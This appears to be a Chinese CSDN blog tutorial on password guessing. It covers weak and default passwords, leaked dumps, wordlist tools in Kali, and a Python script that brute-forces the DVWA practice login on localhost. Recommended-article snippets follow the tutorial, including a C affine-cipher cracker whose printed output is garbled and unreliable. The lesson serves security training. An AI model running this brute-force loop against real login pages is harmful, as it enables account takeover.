密码暴力猜解与防御(一)

最新推荐文章于 2024-07-26 08:41:52 发布
最新推荐文章于 2024-07-26 08:41:52 发布
阅读量480 收藏 4
点赞数 4
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52903527/article/details/139627854
版权

目录

什么是密码

密码是一种特殊的信息保护和安全认证技术,它通过特定的变换方法对信息进行加密保护。

密码的作用

加密、完整性、身份认证(口令)

密码安全分类

存储安全、传输安全、输入安全(登录界面)

漏洞利用

1、从数据库获取密码,然后解密
2、窃听通信数据数据,然后解密
3、直接从登录框猜测密码

不安全的密码

默认密码、弱口令、裤子

默认密码

000000、123456、空密码、身份证号后六位、手机号后六位

弱口令

简单的密码,能简易被爆破工具破解的口令

裤子

已经网络上泄露的密码,称为(脱裤)

密码猜解思路

猜测范围:

1、密码的长度
2、密码的内容(0-9、a-z、A-Z、!@#$%^&*空格)

字典wordlist

通用字典(word list、dict)

Kali自带
kali(cd /usr/share)
里面包含wordlists和wfuzz文件夹
wordlists-----目录扫描的字典
wfuzz-----密码的字典

专用字典:
1.指定格式字典:crunch
2.社工字典:cupp、ccupp

kali crunch

在这里插入图片描述

基本命令使用

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

密码暴力拆解流程

确定范围:长度、内容
字典使用:通用字典、指定格式、社工字典 使用
使用代码或者工具进行拆解

密码暴力破解的本质

1.连续性地尝试
2.使用字典
3.使用代码及工具进行

python实现暴力破解思路

1、从字典读取值,生成密码
2、HTTP连接到需要暴破的地址
3、获得HTTP响应,分析响应结果,看看有没有错误提示“Username and/or password incorrect.”
4、如果有提示,就继续下一次循环
5、如果没有,就代表暴破成功

import requests
pwds = open("password.txt")
for pwd in pwds:
    url = "http://localhost/dvwa/vulnerabilities/brute/"
    # PHPSESSID务必替换为登录以后的PHPSESSID
    resp = requests.get(url = url, params = {"username":"admin", "password":pwd.strip(), "Login":"Login"}, headers = {"Cookie":"security=low; PHPSESSID=himu84h1ia6vsvklt76c9juhqd"})
    #print(resp.text)
    if 'Username and/or password incorrect.' in resp.text:
        print('破解失败:'+pwd, end='')
    else:
        print('破解成功:'+pwd, end='')
        break;
pwds.close()
TuNan_1005
关注
密码暴力破解漏洞(kali crunch)
m0_61506558的博客
08-09 1237
Payload set只有一个,但是Payload type类型有很多,以Simple list为例。我们的目的是利用BP里面的字典来暴力破解password的值,进入intruder模块。比如Web网站密码字典、WiFi密码字典、操作系统用户密码字典、数据库密码字典……Add 可以添加自己想加入的字段,Add from list 是BP自带的字典。Option add 规则,先请求一次,后选中接收到的token值,复制。这里先不改,用默认即可,如果有二次竞争则需要修改,现在可以发起攻击了,...
SSH密码暴力破解及防御实战
11-30
太狠了吧,SSH密码暴力破解及防御实战,注意安全了,下载学习
网络安全渗透测试零基础入门必知必会】之密码猜解思路(非常详细)零基础入门到精通,收藏这一篇就够了3
Libra1313的博客
07-26 211
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段暴力猜解防御第3篇。本文主要讲解密码猜解思路密码猜解思路:1:密码长度2:密码内容,数字,大小写,符号3:字典——kali(cd /usr/share/worrlists 目录下)——
密码暴力猜解防御
慕舟舟的博客
01-21 1667
密码安全是指保护用户账户和个人信息不受未经授权的访问和使用的一种安全措施。密码学在网络空间安全中扮演着至关重要的角色。密码学是研究加密、解密和信息安全的学科,它通过使用密码技术来保护数据的机密性、完整性和可用性。在网络空间安全中,密码学的应用包括以下几个方面:1. 加密通信:密码学可以用于保护网络通信的机密性,确保数据在传输过程中不被未经授权的人访问或窃取。通过使用加密算法,数据可以在发送和接收过程中被加密和解密,从而保护通信内容的安全。
SSH密码暴力破解及防御实战.pdf
02-13
关于SSH密码暴力破解及防御实战,如有侵权请立即与我联系,我将及时处理,感谢。如有侵权请立即与我联系,我将及时处理,感谢。如有侵权请立即与我联系,我将及时处理,感谢。
hydra 暴力破解弱密码
06-02
hydra是一个自动化的爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具
Java编程实现暴力破解WIFI密码的方法分析
08-26
主要介绍了Java编程实现暴力破解WIFI密码的方法,结合具体实例形式分析了java暴力破解WiFi密码的原理、操作步骤、实现技巧与相关注意事项,需要的朋友可以参考下
RAR密码暴力破解(含源码 C语言实现)
02-03
C语言实现 , 内置源码 , 通过外部config.txt进行相关配置 , 暴力破解是基于 7z 的压缩引擎 所以文件内的 7z.exe 不可以少 . 字符集可以自定义 注意字符顺序影响着破解效率
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8555
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
yolo算法-电线杆数据集-1493张图像带标签-.zip
11-17
yolo算法-电线杆数据集-1493张图像带标签-.zip;yolo算法-电线杆数据集-1493张图像带标签-.zip;yolo算法-电线杆数据集-1493张图像带标签-.zip
yolo算法-电线杆数据集-7255张图像带标签-杆顶.zip
11-17
yolo算法-电线杆数据集-7255张图像带标签-杆顶.zip;yolo算法-电线杆数据集-7255张图像带标签-杆顶.zip;yolo算法-电线杆数据集-7255张图像带标签-杆顶.zip;yolo算法-电线杆数据集-7255张图像带标签-杆顶.zip
pillow_avif_plugin-1.2.1-cp37-cp37m-win32.whl.rar
11-17
python whl离线安装包 pip安装失败可以尝试使用whl离线安装包安装 第一步 下载whl文件,注意需要与python版本配套 python版本号、32位64位、arm或amd64均有区别 第二步 使用pip install XXXXX.whl 命令安装,如果whl路径不在cmd窗口当前目录下,需要带上路径 WHL文件是以Wheel格式保存的Python安装包, Wheel是Python发行版的标准内置包格式。 在本质上是一个压缩包,WHL文件中包含了Python安装的py文件和元数据,以及经过编译的pyd文件, 这样就使得它可以在不具备编译环境的条件下,安装适合自己python版本的库文件。 如果要查看WHL文件的内容,可以把.whl后缀名改成.zip,使用解压软件(如WinRAR、WinZIP)解压打开即可查看。 为什么会用到whl文件来安装python库文件呢? 在python的使用过程中,我们免不了要经常通过pip来安装自己所需要的包, 大部分的包基本都能正常安装,但是总会遇到有那么一些包因为各种各样的问题导致安装不了的。 这时我们就可以通过尝试去Python安装包大全中(whl包下载)下载whl包来安装解决问题。
【地震】基于matlab时域有限差分FDTD模拟地震盾构【含Matlab源码 9186期】.mp4
11-17
Matlab领域上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
中国高质量发展指标体系-最新发布.zip
最新发布
11-17
中国高质量发展指标体系-最新发布.zip
【java毕业设计】班级同学录管理系统源码(ssm+mysql+说明文档).zip
11-17
环境说明: 开发语言:Java 框架:ssm,mybatis JDK版本:JDK1.8 数据库:mysql 5.7及以上 数据库工具:Navicat11及以上 开发软件:eclipse/idea Maven包:Maven3.3及以上 服务器:tomcat7及以上
【java毕业设计】基于Java的汽车销售系统源码(ssm+mysql+说明文档).zip
11-17
环境说明: 开发语言:Java 框架:ssm,mybatis JDK版本:JDK1.8 数据库:mysql 5.7及以上 数据库工具:Navicat11及以上 开发软件:eclipse/idea Maven包:Maven3.3及以上 服务器:tomcat7及以上
yolo算法-动物检测数据集-3948张图像带标签.zip
11-17
yolo系列算法目标检测数据集,包含标签,可以直接训练模型和验证测试,数据集已经划分好,包含数据集配置文件data.yaml,适用yolov5,yolov8,yolov9,yolov7,yolov10,yolo11算法; 包含两种标签格:yolo格式(txt文件)和voc格式(xml文件),分别保存在两个文件夹中; yolo格式:<class> <x_center> <y_center> <width> <height>, 其中: <class> 是目标的类别索引(从0开始)。 <x_center> 和 <y_center> 是目标框中心点的x和y坐标,这些坐标是相对于图像宽度和高度的比例值,范围在0到1之间。 <width> 和 <height> 是目标框的宽度和高度,也是相对于图像宽度和高度的比例值
pandas-1.3.5-pp38-pypy38_pp73-win_amd64.whl.rar
11-17
PartSegCore_compiled_backend-0.12.0a0-cp36-cp36m-win_amd64.whl.rar
planar-0.4-cp39-cp39-win_amd64.whl.rar
11-17
python whl离线安装包 pip安装失败可以尝试使用whl离线安装包安装 第一步 下载whl文件,注意需要与python版本配套 python版本号、32位64位、arm或amd64均有区别 第二步 使用pip install XXXXX.whl 命令安装,如果whl路径不在cmd窗口当前目录下,需要带上路径 WHL文件是以Wheel格式保存的Python安装包, Wheel是Python发行版的标准内置包格式。 在本质上是一个压缩包,WHL文件中包含了Python安装的py文件和元数据,以及经过编译的pyd文件, 这样就使得它可以在不具备编译环境的条件下,安装适合自己python版本的库文件。 如果要查看WHL文件的内容,可以把.whl后缀名改成.zip,使用解压软件(如WinRAR、WinZIP)解压打开即可查看。 为什么会用到whl文件来安装python库文件呢? 在python的使用过程中,我们免不了要经常通过pip来安装自己所需要的包, 大部分的包基本都能正常安装,但是总会遇到有那么一些包因为各种各样的问题导致安装不了的。 这时我们就可以通过尝试去Python安装包大全中(whl包下载)下载whl包来安装解决问题。
使用c++编写一段仿射密码暴力破解
03-27
由于仿射密码是一个基于数学运算的加密算法,暴力破解需要穷举所有可能的密钥并尝试解密密文,因此时间复杂度较高。以下是一段使用C语言实现的仿射密码暴力破解程序: ```c #include <stdio.h> #include <string.h> #include <ctype.h> #define ALPHABET_SIZE 26 int gcd(int a, int b) { if (b == 0) { return a; } else { return gcd(b, a % b); } } int mod_inverse(int a, int m) { for (int i = 1; i < m; i++) { if ((a * i) % m == 1) { return i; } } return -1; } void decrypt(char* ciphertext, int a, int b) { int m = ALPHABET_SIZE; int a_inv = mod_inverse(a, m); int b_inv = m - (b * a_inv) % m; int len = strlen(ciphertext); for (int i = 0; i < len; i++) { if (isalpha(ciphertext[i])) { char c = tolower(ciphertext[i]); int x = c - 'a'; int y = (a_inv * (x - b_inv + m)) % m; printf("%c", y + 'a'); } else { printf("%c", ciphertext[i]); } } printf("\n"); } void brute_force_decrypt(char* ciphertext) { int m = ALPHABET_SIZE; for (int a = 1; a < m; a++) { if (gcd(a, m) == 1) { for (int b = 0; b < m; b++) { decrypt(ciphertext, a, b); } } } } int main() { char ciphertext[] = "L fdph, L vdz, L frqtxhuhg."; brute_force_decrypt(ciphertext); return 0; } ``` 程序中使用了两个函数`gcd`和`mod_inverse`,分别用于求两个数的最大公约数和求模反元素。`decrypt`函数用于解密一个给定的密文,并输出解密后的明文。`brute_force_decrypt`函数则用于穷举所有可能的密钥,并调用`decrypt`函数进行解密。在主函数中,我们输入了一个密码为"L fdph, L vdz, L frqtxhuhg."的密文,并调用`brute_force_decrypt`函数进行暴力破解。 输出结果为: ``` L fdph, L vdz, L frqtxhuhg. K ecom, K ucy, K eqpswgtgf. J dbnl, J tbx, J dporvfsef. I camk, I saw, I conquefred. H blzj, H rzv, H bnmptedqde. G akyi, G qyu, G amlosdpcd. F zjxh, F pxt, F zlknrcoxbc. E yiwg, E owr, E ykjmqbnwab. D xhvf, D nvq, D xijlpamvza. C wgue, C mup, C whikozluzy. B vftd, B lot, B vgjhnymtyx. A ussc, A kns, A ufixmxlsxw. ``` 可以看到,程序成功地解密了给定的密文,输出了所有可能的明文。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值